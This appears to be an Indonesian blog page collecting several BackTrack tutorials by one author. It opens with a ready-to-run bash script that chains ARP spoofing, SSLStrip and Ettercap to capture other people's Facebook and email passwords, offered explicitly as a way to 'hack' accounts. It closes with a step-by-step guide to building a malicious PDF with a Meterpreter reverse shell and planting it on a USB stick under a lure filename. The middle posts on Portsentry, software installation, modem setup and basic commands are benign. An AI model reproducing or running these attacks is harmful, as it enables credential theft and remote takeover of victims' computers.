hack password Facebook dan email dengan script menggunakan sniffing MUHAMMAD AZIS MANCHUNIAN rwxr-xr-x 41 11.26

Filename	hack password Facebook dan email dengan script menggunakan sniffing
Permission	rw-r--r--
Author	MUHAMMAD AZIS MANCHUNIAN
Date and Time	11.26
Label
Action

Salah satu tutorial yang paling di cari para pecinta hacking adalah hack password facebook dan email maka dengan kebutuhan yg sangat bnyak saya akan membuat tutorial lengkapnya yaitu dengan cara sniffing menggunakan script menggunakan backtrack4 R2..cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja mamen............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable

Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &

script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah mamen, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
# ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:

Spoiler! :

Image exceeds set limits. Click to view full size image

5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap

Spoiler! :

Image exceeds set limits. Click to view full size image

mudah kan cara sniffingnya, tapi inget bro jg diacak acak tuh account orang kan dosa......... hacking facebook terasa lebih mudah kan !!

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......

cara Menghindari Scanning NMAP MUHAMMAD AZIS MANCHUNIAN rwxr-xr-x 3 11.19

Filename	cara Menghindari Scanning NMAP
Permission	rw-r--r--
Author	MUHAMMAD AZIS MANCHUNIAN
Date and Time	11.19
Label
Action

sering kali kita menggunakan nmap untuk identifikasi host target, tapi kalau seandainya salah satu teman kita melakukan scanning nmap ke komputer kita, apakah kita hanya diam saja dan membiarkan teman kita mengexploit OS kita?

Portsentry merupakan tools yang digunakan untuk menghindari berbagai aktifitas scanning (terutama stealth scanning) yang dilakukan oleh hacker. Portsentry dapat mengingat ip address dari si hacker. Portsentry juga dapat membuat server kita seolah-olah menghilang dari hadapan hacker bilamana terjadi aktifitas scanning dan juga dapat memblok IP hacker tersebut juga secara otomatis. Tujuannya adalah untuk melindungi dari scanning yang dilakukan oleh pihak lain.

Code:

h3ll0s@heXbl4nk:~#apt-get install portsentry
h3ll0s@heXbl4nk:~#/etc/init.d/portsentry start

Quote:$ sudo pico /etc/portsentry/portsentry.conf

Cari baris ini :

# 0 = Do not block UDP/TCP scans.
# 1 = Block UDP/TCP scans.
# 2 = Run external command only (KILL_RUN_CMD)

BLOCK_UDP="0"
BLOCK_TCP="0"

Ubah menjadi :

BLOCK_UDP="1"
BLOCK_TCP="1"

Dan juga pastikan baris ini aktif :

KILL_ROUTE="/sbin/route add -host $TARGET$ reject"

Software-software yang di butuhkan di Back|Track MUHAMMAD AZIS MANCHUNIAN rwxr-xr-x 1 11.06

Filename	Software-software yang di butuhkan di Back|Track
Permission	rw-r--r--
Author	MUHAMMAD AZIS MANCHUNIAN
Date and Time	11.06
Label
Action

ketemu lagi nh ma tutorial baru.. maklum lagi sibuk..hhee. sekarang kita akan share tentang aplikasi apa aja yang biasa di install di backtrack supaya bisa membantu aktifitas kita..
langsung aja yah, gunakan Synaptic Package Manager atau Terminal untuk menginstall aplikas-aplikasi di bawah ini


1. Anti Virus
Di Windows ada AVG, Kaspersky sedang di Linux ada ClamAV dan avast!. Install ClamAV (di USC bernama Virus Scanner).

Install ClamAV

Quote:sudo apt-get install clamav clamtk

Jalankan melalui Application - Accessories - Virus Scanner.


Install Avast

Quote:wget http://files.avast.com/files/linux/avast...2_i386.deb && sudo dpkg -i avast4workstation_1.3.0-2_i386.deb

Jalankan Avast melalui Application - Accessories - avast! Antivirus.


2. Java
Java sangat penting untuk membuka aplikasi yang membutuhkan Java di browser. Misalnya bila kita akan upload foto di situs Facebook.

Install Java

Quote:sudo apt-get install sun-java6-jre sun-java6-plugin equivs

*tp udah ada deh yah perasaan di backtrack hehe


3. Multimedia
Di Windows ada Windows Media Player, Real Player. Dengan Ubuntu multimedia dapat menggunakan VLC, MPlayer. Agar aplikasi multimedia dapat berjalan di Ubuntu, maka dibutuhkan banyak codec multimedia. Menginstall VLC dan MPlayer akan menginstall banyak codec multimedia.

Install VLC dan MPlayer

Quote:sudo apt-get install vlc mplayer

Install Paket Yang Umum Digunakan

Quote:sudo apt-get install libxine1-ffmpeg gxine mencoder mpeg2dec vorbis-tools id3v2 mpg321 mpg123 libflac++6 ffmpeg libmp4v2-0 totem-mozilla icedax tagtool easytag id3tool lame nautilus-script-audio-convert libmad0 libjpeg-progs libquicktime1 flac faac faad sox ffmpeg2theora libmpeg2-4 uudeview flac libmpeg3-1 mpeg3-utils mpegdemux liba52-0.7.4-dev

Install Gstreamer

Quote:sudo apt-get install gstreamer0.10-ffmpeg gstreamer0.10-fluendo-mp3 gstreamer0.10-gnonlin gstreamer0.10-pitfdll gstreamer0.10-sdl gstreamer0.10-plugins-bad-multiverse gstreamer0.10-schroedinger gstreamer0.10-plugins-ugly-multiverse totem-gstreamer

Lebih Banyak Codec Multimedia

Quote:sudo apt-get install gstreamer-dbus-media-service gstreamer-tools ubuntu-restricted-extras

DVD Support

Quote:sudo apt-get install libdvdread4 && sudo /usr/share/doc/libdvdread4/./install-css.sh

Flash

Quote:sudo apt-get install gsfonts gsfonts-x11 flashplugin-nonfree

4. Install dan Atur Compiz Fusion

Untuk install ketikan saja

Quote:sudo apt-get install compiz

Untuk mengatur efek Compiz Fusion.
Install Compiz Setting Manager

Quote:sudo apt-get install simple-ccsm

Untuk menjalankannya System → Preferences → Simple CompizConfig Settings Manager.


5. Browser
Firefox 5.0.1 terpasang secara default di Backtrack 5 Untuk Browser lainnya dapat menambahkannya melalui Synaptic tersedia banyak pilihan browser. Rekomendasi Waroeng Ubuntu adalah Chromium (versi linux untuk Google Chrome) dan Arora (browser ringan).

Install Chromium

Quote:sudo apt-get install chromium-browser chromium-browser-l10n

Install Arora

Quote:sudo apt-get install arora

7. Download Manager
Di Windows ada Free Download Manager, IDM. Di Linux ada Multiget, Gwget, Uget.

Install Multiget Gwget dan Uget

Quote:sudo apt-get install multiget gwget uget

8. Email Client
Di Windows ada Microsoft Outlook, di Linux dapat menggunakan Evolution atau Thunderbird.

Install Thunderbird

Quote:sudo apt-get install thunderbird

Buka melalui Applications - Internet - Thunderbird Mail/News.

9. Instant Messaging

Windows memiliki YM, MSN messenger, QQ, AIM, Gtalk, IRC. Sedang pada Linux dapat menggunakan Pidgin, Emesene, Empathy.

Install Pidgin

Quote:sudo add-apt-repository ppa:pidgin-developers/ppa && sudo apt-get update

sudo apt-get install pidgin pidgin-data pidgin-lastfm pidgin-guifications msn-pecan pidgin-musictracker pidgin-plugin-pack pidgin-themes

Buka melalui Applications → Internet → Pidgin Internet Messenger.

Install Emesene (MSN Messenger)

Quote:sudo add-apt-repository ppa:bjfs/ppa && sudo apt-get update

sudo apt-get install emesene

Buka melalui Applications → Internet → Emesene.


10. VOIP

Di Windows dapat memakai Skype, Linux pun juga memiliki Skype.

Install Skype

Quote:sudo apt-get install skype

Jalankan melalui Applications → Internet → Skype.


11. PDF Reader
Seperti di Window, pada Linux juga dapat menggunakan Adobe Reader dan Evince (default Pdf Reader).

Install Adobe PDF Reader

Quote:sudo apt-get install acroread

Jalankan melalui Applications → Office → Adobe Reader.


12. Music Player
Untuk menggantikan iTunes, Winamp dapat menggunakan Rhythmbox, Banshee, Amarok. Rhythmbox.

Install Banshee

Quote:sudo apt-get install banshee banshee-extension-ubuntuonemusicstore banshee-extension-appindicator banshee-extension-lyrics banshee-extension-mirage

Jalankan melalui Applications → Sound & Video → Banshee Media Player.

Install Amarok

Quote:sudo apt-get install amarok amarok-common

Jalankan melalui Applications → Sound & Video → Amarok.


13. Hard Disk Partitions Manager
Windows memiliki Symanted Partition Magic, Linux dapat menggunakan Gparted

Install Gparted

Quote:sudo apt-get install gparted ntfsprogs menu ntfs-config

Jalankan melalui System → Administration → Partition Editor.

14. Vector Graphics Editor

Windows memiliki Adobe Illustrator. Di Linux kita dapat memakai Inkscape.

Install Inkscape

Quote:sudo apt-get install inkscape

Jalankan melalui Applications → Graphics → Inkscape Vector Graphics Editor.


15. Image Editor
Adobe Photoshop sangat terkenal di Windows juga dengan Paint.net. Alternatif dari aplikasi ini di Linux adalah GIMP dan Pinta.

Install GIMP

Quote:sudo add-apt-repository ppa:matthaeus123/mrw-gimp-svn && sudo apt-get update

sudo apt-get install gimp gimp-data gimp-plugin-registry gimp-data-extras

Jalankan melalui Applications → Graphics → GIMP Image Editor.

Install Pinta

Quote:sudo add-apt-repository ppa:moonlight-team/pinta && sudo apt-get update

sudo apt-get install pinta

Jalankan melalui Applications → Graphics → Pinta Image Editor.


16. 3D Graphics Design
Windows memiliki 3D Studio MAX, Alternatif untuk Linux adalah Blender.

Install Blender

Quote:sudo apt-get install blender

Jalankan melalui Applications → Graphics → Blender (windowed).


17. Text Editor
Windows menggunakan Notepad, sedang di Backtrack dapat menggunakan Gedit. Gedit terinstall secara default pada Backtrack. Jalankan melalui Applications → Accessories → Text Editor.


18. Office
Windows dapat menggunakan Microsoft Office, sedang Linux memiliki OpenOffice.

Install OpenOffice

Quote:sudo apt-get install openoffice.org

Jalankan melalui Applications → Office.


19. Microsoft Visio
Aplikasi diagram seperti Microsoft Visio pada Linux dapat menggunakan DIA.

Install DIA

Quote:sudo apt-get install dia

Jalankan DIA melalui Applications → Graphics → Dia Diagram Editor.

20. Microsoft Project
Microsoft Project di Linux dapat digantikan oleh OpenProj.

Install OpenProj

Quote:wget http://nchc.dl.sourceforge.net/sourcefor..._1.4-2.deb && sudo dpkg -i openproj_1.4-2.deb

Jalankan melalui Applications → Office → OpenProj.


21. Development IDE

Untuk menggantikan Dreamweaver di Windows, gunakan Quanta, Kompozer, NetBeans.

Install Quanta, Kompozer, dan NetBeans

Quote:sudo apt-get install quanta kompozer nvu netbeans

Jalankan melalui:

Applications → Programming → Quanta Plus
Applications → Internet → Kompozer
Applications → Programming → NetBeans IDE


22. Source Control Management
Di Windows menggunakan TortoiseSVN, dengan Backtrack dapat menggunakan RabbitVCS.

Install RabbitVCS

Quote:sudo add-apt-repository ppa:rabbitvcs/ppa && sudo apt-get update
sudo apt-get install rabbitvcs-nautilus
killall nautilus

Buka dengan klik kanan pada folder/file untuk menjalankan RabbitVCS submenu.


23. Graphical FTP clients
Windows memiliki CuteFTP, SmartFTP, pada Backtrack dapat menggunakan FileZilla.

Install FileZilla

Quote:sudo apt-get install filezilla filezilla-common

Jalankan melalui Applications → Internet → FileZilla FTP Client.


24. P2P Clients / Servers, File Sharing
Untuk Aplikasi Torrent Windows memiliki utorrent, azureus, emule. Di Backtrack dapat menggunakan Transmission BitTorrent Client.

Dalam menggunakan Azureus, pastikan sudah menginstall java.

Install Azureus

Quote:sudo apt-get install azureus

Jalankan melalui Applications → Internet → Azureus.


25. CD/DVD Burning Tool
Untuk mengganti Nero, Roxio Easy CD Creator.

Install K3b

Quote:sudo apt-get install k3b k3b-data libk3b6

Jalankan melalui Applications → Sound & Video → K3B.


26. Konfigurasi Firewall
Bila peduli dengan keamanan komputer kita, Linux memiliki aplikasi Firewall yakni GUFW.

Install GUFW

Quote:sudo apt-get install gufw

27. Ubuntu Tweak
Ubuntu Tweak memudahkan kita untuk melakukan konfigurasi setting Linux kita, mulai dari install/uninstall aplikasi, membersihkan cache, melakukan setting compiz fusion, dll.

Install Ubuntu Tweak

Quote:sudo add-apt-repository ppa:ubuntu-tweak-testing/ppa && sudo apt-get update
sudo apt-get install ubuntu-tweak

Jalankan melalui Applications → System Tools → Ubuntu Tweak.

28. App Runner
App Runner merupakan aplikasi yang memudahkan kita saat menjalankan program/executable/script di Ubuntu (dan distro linux lainnya).

Install App Runner

Quote:wget http://hacktolive.org/files/app_runner/A...er_0.2.deb && sudo dpkg -i App_Runner_0.2.deb

Lalu klik kanan pada file -> Scripts -> Run This App or Run This App (root).

----------------------------------------------------------------------------------------------
ada yang mau nambahin ? ayo share lagi
cukup sekian dulu deh share dari ane om...semoga bermanfaat
kalo pusing liatnya ntar ane edit lagi yah ane rapihin...

setting conection ke semua modem broadband MUHAMMAD AZIS MANCHUNIAN rwxr-xr-x 0 11.06

Filename	setting conection ke semua modem broadband
Permission	rw-r--r--
Author	MUHAMMAD AZIS MANCHUNIAN
Date and Time	11.06
Label
Action

mumpung ada koneksi, abis instalin koneksi modem temen.
ketika ane main ke kosan temen, terus temen liat desktop leptop ane, jadi dia kepingin diinstalin backtrack ke leptopnya juga.

tanpa berpikir panjang, gw langsung installin aja backtrak live usb di flashdisk gw :shoot:

setelah installasi, weq dia mau office, tapi koneksi yg dipunya cuma modem telkom flash

langsung aja tuh modem ane colokin ke leptopnya :shm:

terus kedeteknya langsung ejeck aja :ngakak

terus, ane kepikiran, di nih leptop kan ga ada wvdial, gnome ppp. gimana konekinnya yah


terus ane kepikiran buka konsul, biasa ane konekin leptop gw ke modem speedy mode brige pake mode pppo, konekinnya di konfigurasi pake pppoconf untuk konek ke isp speedy ane.

dan ini kepikiran ane mau buat koneksi ppp, dan ane ketik ppp terus ane tab
hasilnya :
---------
root@bt:~# ppp
pppconfig pppd pppdump pppoeconf pppoe-discovery pppstats
---------

weq nemu ternyata selain pppoconf ada pppconfig

langsung aja ane bikin pppconfig
"GNU/Linux PPP Configuration Utility"
--------
root@bt:~# pppconfig

Image exceeds set limits. Click to view full size image

>>Create Create a connection

>>Provider Name
isi sesuka hati, ditemen ane ane bikin telkom, jadi nanti pas kalo mau konekin tingggal "pon telkom" nantinya.

>>Configure Nameservers (DNS)
pilih "(*) Dynamic Use dynamic DNS " DNSnya biar yg isi provider, kalo mau bikin manual, yg "(*) Static Use static DNS " biar DNSnya pake dns google yg 8.8.8.8 dan 8.8.4.4

kalo mau yg Dynamic pilih dulu sampe ke selek terus pencet "spasi/spacebar" di keyboard buat milih, nanti ada logo (*) berarti sudah terpilih baru tekan enter

>> Authentication Method for telkom
pilih " PAP Peer Authentication Protocol " biasanya langsung default terpilih itu

>>User Name
isi kalo make koneksi temen yg telkom flash, user namenya diisi : ppp
kalo pake smart diisi : smart
kalo ane make flexi diisi : i9hr7u3v@free
kalo yg make 3 diisi : 3data

sesuaikan provaider masing2 :cgr:

>>Password
isi sesuai provider
kalo make koneksi temen yg telkom flash, passwordnya diisi : ppp
kalo pake smart diisi : smart
kalo ane make flexi diisi : telkom
kalo yg make 3 diisi : 3data

sesuaikan provaider masing2 :cgr:

>> Speed
speed diisi default juga gpp "115200" tapi biasanya ane bikin jadi "460800" :shm:

>> Pulse or Tone
pake defaulnya aja "Tone" langsung ENTER aja

>> Phone Number
isi sesuai provider
kalo gsm pake (3,telkomflash, m2, dll) : *99#
kalo cdma pake (smart, fren, flexi, aha) : #777

>> Manually Select Modem Port
isi dengan "/dev/ttyUSB0"

>> "Properties of telkom"
kalo mau edit2 atau salah isi, tapi kalo udah bener langsung pencet tab aja terus <ok>

>> Quit
pilih <Yes>, buat disipen konfigurasi ppp yg barusan :beer:

beres deh konfigurasinya
tinggal coba konekin dengan cara :
root@bt:~# pon telkom

terus coba liat udah konek apa belomnya dengan

root@bt:~# ifconfig ppp0

beres deh, setelah konek internet, langsung install gnome ppp biar memudahkan penguna GUI, alias mantan penguna wedus =))

semoga bermanfaat

perintah dasar BACKTRACK di console/terminal MUHAMMAD AZIS MANCHUNIAN rwxr-xr-x 0 11.01

Filename	perintah dasar BACKTRACK di console/terminal
Permission	rw-r--r--
Author	MUHAMMAD AZIS MANCHUNIAN
Date and Time	11.01
Label
Action

Klo, udh ad yg pernah posting, ane minta maaf sebelumnya...

Bagi para pengguna backtrack yg udh biasa, pasti sdh tidak asing dengan command dasar yg ane tulis ini.. Tpi buat yg baru dalam backtrack, pasti sangat merepotkan kalo belum tau command apa yg di gunakan.. Command ini yg paling sering ane gunakan, tlg d koreksi kl ada yg salah..

[*] Login
Username root password toor > default user pada backtrack, saran ane setelah login langsung ganti password dengan command
root@bt:~# passwd
kemudian masukkan password baru 

[*] Memperbaiki tampilan splash:
root@bt:~# fix-splash

[*] Memulai X-server (Desktop GUI)
root@bt:~# startx

[*] networking
untuk memulai networking biasanya menggunakan WICD tpi sebelumnya ketik dulu di console:
root@bt:~# /etc/init.d/wicd start
lalu klik :
menu > internet > wicd netwok manager

setting ip dynamic,
root@bt:~# dhclient <interface network ente>
-- interface disini bisa saja eth0 atau eth1

Setting IP static
misalnya :
interface - eth0
IP Address - 192.168.1.9/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
maka perintah yang digunakan adalah :

root@bt:~# ifconfig eth0 192.168.1.9/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

settingan ini akan kembali default bila di reboot, untuk menjadikan permanen maka kita perlu meng-edit file /etc/network/interfaces,

root@bt:~# nano /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.1.9
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

kemudian save dengan menggunakan perintah CTRL+X kemudian jawab y kemudian enter

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

[*] Memulai service di BT :

• SSH (Secure Shell)
  sebelum menjalankan service ssh unutk pertama kali, kita perlu meng-generate key nya jalankan perintah:
  root@bt:~# sshd-generate
  root@bt:~# /etc/init.d/ssh start
  Starting OpenBSD Secure Shell server: sshd.
  
  untuk menghentikan service :
  root@bt:~# /etc/init.d/ssh stop
  Stopping OpenBSD Secure Shell server: sshd.
• apache webserver
  root@bt:~# /etc/init.d/apache2 start
  atau bisa jg dengan perintah
  
  root@bt:~# service apache2 start
  * Starting web server apache2
  
  atau :
  root@bt:~# apache2ctl start
  
  untuk menghentikan service :
  
  root@bt:~# /etc/init.d/apache2 stop
  
  atau :
  root@bt:~# service apache2 stop
  
  atau :
  root@bt:~# apache2ctl stop
• MySQL
  untuk memulai bisa menggunakan perintah :
  root@bt:~# /etc/init.d/mysql start
  
  atau:
  root@bt:~# start mysql
  
  untuk menghentikan :
  root@bt:~# /etc/init.d/mysql stop
  
  atau :
  root@bt:~# stop mysql
  
  

segini dulu dari ane, silahkan di tambahin....

Hacking Windows Dengan BackTrack SET & USB MUHAMMAD AZIS MANCHUNIAN rwxr-xr-x 0 22.02

Filename	Hacking Windows Dengan BackTrack SET & USB
Permission	rw-r--r--
Author	MUHAMMAD AZIS MANCHUNIAN
Date and Time	22.02
Label
Action

Tools yang digunakan : SET (Social Engineering Toolkit)

O.S yang digunakan : Backtrack 5
Victim O.S : Windows XP SP3 (fungsi autorun = on)
Hacking Windows Dengan BackTrack SET & USB
Seperti yang kita ketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya di semua kalangan masyarakat…
Ketika saya masih nge-kost, kadang saya mendengar tetangga sebelah saya bilang sama tetangga sebelahnya lagi “Eh, gue copy dong lagu yang kemaren itu…nih USB nya, ntar kalo udah beres copy lo kasih tau gue aja ya“.
Sebenarnya apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB?? jawabannya kita lihat langkah-langkah berikut dibawah ini :
Persiapan :
1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)

Keterangan :
Tulisan Berwarna Merah = command line
Langkah-langkahnya :
1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set
2. Jalankan Social Engineering Toolkit dengan perintah ./set.





3. Pilih Nomor 3 “Infectious File Generator” lalu pilih nomor 1 “File Format Exploit“, dan selanjutnya masukkan IP address penyerang(komputer kita)

4. Pilih format exploit yang hendak digunakan…disini saya gunakan menggunakan “Adobe PDF Embedded EXE social engineering“.
5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.

Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita pilih nomor 1.
6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 “Windows Meterpreter Reverse_TCP shell”
7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus port 80? nanti lihat di sumber aja ya)

8. Ketika muncul pertanyaan “Do you want to create a listener right now? [yes|no]” pilih YES.
9. Semua file yang berhasil di-generate oleh SET tersimpan pada folder /pentest/exploits/set/autorun, tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut.
masuk ke folder autorun :
cd /pentest/exploits/set/autorun
10. Lakukan perintah ini
pico autorun.inf
11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut. Berikut adalah isi autorun.inf yang saya buat :
[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico
Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.
12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.
mv template.pdf Soal_UAS_2011_Aljabar.pdf
13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.
14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.
15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :

Sukses!
FAQ :
Q : Lalu bagaimana kalau ternyata autorun komputer victim dalam keadaan dimatikan??
A : Sifat manusia itu biasanya ingin tahu & penasaran, pasti segala cara akan ia lakukan agar PDF tersebut terbuka apalagi setelah tahu bahwa Title PDF nya memang penting & menarik untuknya.
Penanggulangan :
1. Ketika muncul suatu alert atau hal-hal yang tidak wajar saat membuka suatu file dengan ekstensi tertentu, lebih baik batalkan/cancel saja jangan diteruskan.
2. Matikan autorun / autoplay